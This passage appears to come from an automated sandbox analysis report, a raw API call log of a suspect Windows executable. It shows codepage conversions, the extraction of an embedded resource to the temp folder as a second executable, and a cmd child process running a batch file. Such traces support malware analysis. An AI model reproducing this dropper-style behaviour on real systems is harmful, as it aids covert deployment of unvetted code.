¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0154.608] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0154.612] GetLastError () returned 0x0 [0154.612] SetLastError (dwErrCode=0x0) [0154.612] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0154.612] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0154.612] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0154.612] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0154.613] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1a6{Qäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0154.613] GetLastError () returned 0x0 [0154.613] SetLastError (dwErrCode=0x0) [0154.613] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0154.613] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0154.613] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0154.613] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0154.613] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1a6{Qäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0154.617] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x80) returned 0x549228 [0155.446] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0155.446] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0155.460] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x549228) returned 0x80 [0155.461] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0155.461] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0155.461] GetCurrentProcess () returned 0xffffffff [0155.461] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0155.461] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0155.462] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0155.464] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0155.465] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0155.465] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0155.465] LockResource (hResData=0x43c648) returned 0x43c648 [0155.465] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x5496f8 [0155.466] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.379] GetLastError () returned 0x20 [0156.379] GetLastError () returned 0x20 [0156.379] SetLastError (dwErrCode=0x20) [0156.379] GetLastError () returned 0x20 [0156.379] SetLastError (dwErrCode=0x20) [0156.379] GetLastError () returned 0x20 [0156.379] SetLastError (dwErrCode=0x20) [0156.380] GetLastError () returned 0x20 [0156.380] SetLastError (dwErrCode=0x20) [0156.381] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1000) returned 0x549718 [0156.381] GetLastError () returned 0x20 [0156.381] SetLastError (dwErrCode=0x20) [0156.382] GetLastError () returned 0x20 [0156.382] SetLastError (dwErrCode=0x20) [0156.382] GetLastError () returned 0x20 [0156.382] SetLastError (dwErrCode=0x20) [0156.382] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e38c | out: lpMode=0x18e38c) returned 1 [0156.383] WriteFile (in: hFile=0x7, lpBuffer=0x18ea68*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e394, lpOverlapped=0x0 | out: lpBuffer=0x18ea68*, lpNumberOfBytesWritten=0x18e394*=0x49, lpOverlapped=0x0) returned 1 [0156.391] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5487f8 | out: hHeap=0x530000) returned 1 [0156.392] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0156.392] ExitProcess (uExitCode=0x1) [0156.929] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5470a0 | out: hHeap=0x530000) returned 1 Process: id = "145" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x34d41000" os_pid = "0x6f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa7c" cmd_line = "cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\"\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 644 os_tid = 0x758 [0156.006] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31fd2c | out: lpSystemTimeAsFileTime=0x31fd2c*(dwLowDateTime=0x186ee160, dwHighDateTime=0x1d68287)) [0156.006] GetCurrentProcessId () returned 0x6f4 [0156.006] GetCurrentThreadId () returned 0x758 [0156.006] GetTickCount () returned 0x11549ec [0156.006] QueryPerformanceCounter (in: lpPerformanceCount=0x31fd24 | out: lpPerformanceCount=0x31fd24*=27634518341) returned 1 [0156.019] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0156.544] __set_app_type (_Type=0x1) [0156.544] __p__fmode () returned 0x770331f4 [0156.544] __p__commode () returned 0x770331fc [0156.545] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0156.545] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0156.545] GetCurrentThreadId () returned 0x758 [0156.545] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x758) returned 0x60 [0156.545] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0156.546] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0156.546] SetThreadUILanguage (LangId=0x0) returned 0x409 [0156.546] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0156.546] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x31fcbc | out: phkResult=0x31fcbc*=0x0) returned 0x2 [0156.546] VirtualQuery (in: lpAddress=0x31fcf3, lpBuffer=0x31fc8c, dwLength=0x1c | out: lpBuffer=0x31fc8c*(BaseAddress=0x31f000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0156.546] VirtualQuery (in: lpAddress=0x220000, lpBuffer=0x31fc8c, dwLength=0x1c | out: lpBuffer=0x31fc8c*(BaseAddress=0x220000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0156.546] VirtualQuery (in: lpAddress=0x221000, lpBuffer=0x31fc8c, dwLength=0x1c | out: lpBuffer=0x31fc8c*(BaseAddress=0x221000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0156.547] VirtualQuery (in: lpAddress=0x223000, lpBuffer=0x31fc8c, dwLength=0x1c | out: lpBuffer=0x31fc8c*(BaseAddress=0x223000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0156.547] VirtualQuery (in: lpAddress=0x320000, lpBuffer=0x31fc8c, dwLength=0x1c | out: lpBuffer=0x31fc8c*(BaseAddress=0x320000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0156.547] GetConsoleOutputCP () returned 0x1b5 [0156.547] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0156.547] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0156.547] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.547] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0156.548] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.548] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0156.548] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.548] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0156.549] _get_osfhandle (_FileHandle=0) returned 0x3 [0156.549] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0156.549] _get_osfhandle (_FileHandle=0) returned 0x3 [0156.549] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0156.550] GetEnvironmentStringsW () returned 0x3b2168* [0156.550] GetProcessHeap () returned 0x3a0000 [0156.550] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xaca) returned 0x3b2c40 [0156.550] FreeEnvironmentStringsW (penv=0x3b2168) returned 1 [0156.550] GetProcessHeap () returned 0x3a0000 [0156.550] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x4) returned 0x3b1850 [0156.550] GetEnvironmentStringsW () returned 0x3b2168* [0156.551] GetProcessHeap () returned 0x3a0000 [0156.551] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xaca) returned 0x3b3718 [0156.551] FreeEnvironmentStringsW (penv=0x3b2168) returned 1 [0156.551] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x31ec2c | out: phkResult=0x31ec2c*=0x68) returned 0x0 [0156.551] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x31ec34, lpData=0x31ec38, lpcbData=0x31ec30*=0x1000 | out: lpType=0x31ec34*=0x0, lpData=0x31ec38*=0x0, lpcbData=0x31ec30*=0x1000) returned 0x2 [0156.551] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x31ec34, lpData=0x31ec38, lpcbData=0x31ec30*=0x1000 | out: lpType=0x31ec34*=0x4, lpData=0x31ec38*=0x1, lpcbData=0x31ec30*=0x4) returned 0x0 [0156.551] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x31ec34, lpData=0x31ec38, lpcbData=0x31ec30*=0x1000 | out: lpType=0x31ec34*=0x0, lpData=0x31ec38*=0x1, lpcbData=0x31ec30*=0x1000) returned 0x2 [0156.551] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x31ec34, lpData=0x31ec38, lpcbData=0x31ec30*=0x1000 | out: lpType=0x31ec34*=0x4, lpData=0x31ec38*=0x0, lpcbData=0x31ec30*=0x4) returned 0x0 [0156.551] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x31ec34, lpData=0x31ec38, lpcbData=0x31ec30*=0x1000 | out: lpType=0x31ec34*=0x4, lpData=0x31ec38*=0x40, lpcbData=0x31ec30*=0x4) returned 0x0 [0156.552] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x31ec34, lpData=0x31ec38, lpcbData=0x31ec30*=0x1000 | out: lpType=0x31ec34*=0x4, lpData=0x31ec38*=0x40, lpcbData=0x31ec30*=0x4) returned 0x0 [0156.552] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x31ec34, lpData=0x31ec38, lpcbData=0x31ec30*=0x1000 | out: lpType=0x31ec34*=0x0, lpData=0x31ec38*=0x40, lpcbData=0x31ec30*=0x1000) returned 0x2 [0156.552] RegCloseKey (hKey=0x68) returned 0x0 [0156.552] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x31ec2c | out: phkResult=0x31ec2c*=0x68) returned 0x0 [0156.552] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x31ec34, lpData=0x31ec38, lpcbData=0x31ec30*=0x1000 | out: lpType=0x31ec34*=0x0, lpData=0x31ec38*=0x40, lpcbData=0x31ec30*=0x1000) returned 0x2 [0156.552] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x31ec34, lpData=0x31ec38, lpcbData=0x31ec30*=0x1000 | out: lpType=0x31ec34*=0x4, lpData=0x31ec38*=0x1, lpcbData=0x31ec30*=0x4) returned 0x0 [0156.552] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x31ec34, lpData=0x31ec38, lpcbData=0x31ec30*=0x1000 | out: lpType=0x31ec34*=0x0, lpData=0x31ec38*=0x1, lpcbData=0x31ec30*=0x1000) returned 0x2 [0156.552] RegQueryValueExW (in: hKey=0x68, 